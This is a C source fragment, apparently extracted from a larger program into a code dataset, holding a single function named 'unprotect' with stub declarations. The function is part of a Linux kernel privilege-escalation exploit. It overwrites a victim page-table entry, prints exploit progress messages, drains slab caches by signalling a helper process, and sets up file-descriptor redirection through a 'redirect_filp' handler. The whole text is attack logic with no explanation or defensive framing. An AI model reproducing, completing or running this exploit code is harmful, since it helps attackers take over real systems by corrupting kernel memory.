
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int DUPTO ;
 int SIGUSR1 ;
 scalar_t__ blah ;
 int dup2 (int ,int) ;
 int fatal (char*) ;
 int fflush (int ) ;
 int get_slab_objs () ;
 int hpid ;
 int kill (int ,int ) ;
 int pause () ;
 int pid ;
 int printf (char*,...) ;
 int redirect_filp ;
 int signal (int ,int *) ;
 int stdout ;
 scalar_t__* victim ;

void unprotect(int v)
{
 int n, c = 1;

 *victim = 0;
 printf("\n[+] parent unprotected PTE "); fflush(stdout);

 dup2(0, 2);
 while (1) {
  n = get_slab_objs();
  if (n < 0)
   fatal("read slabinfo");
  if (n > 0) {
   printf("\n    depopulate SLAB #%d", c++);
   blah = 0; kill(hpid, SIGUSR1);
   while (!blah) pause();
  }
  if (!n) {
   blah = 0; kill(hpid, SIGUSR1);
   while (!blah) pause();
   dup2(0, DUPTO);
   break;
  }
 }

 signal(SIGUSR1, &redirect_filp);
 kill(pid, SIGUSR1);
}
